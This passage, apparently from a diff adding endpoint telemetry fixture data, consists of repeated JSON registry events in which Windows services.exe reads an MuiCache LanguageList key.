"timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849960000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850110000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570850270000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 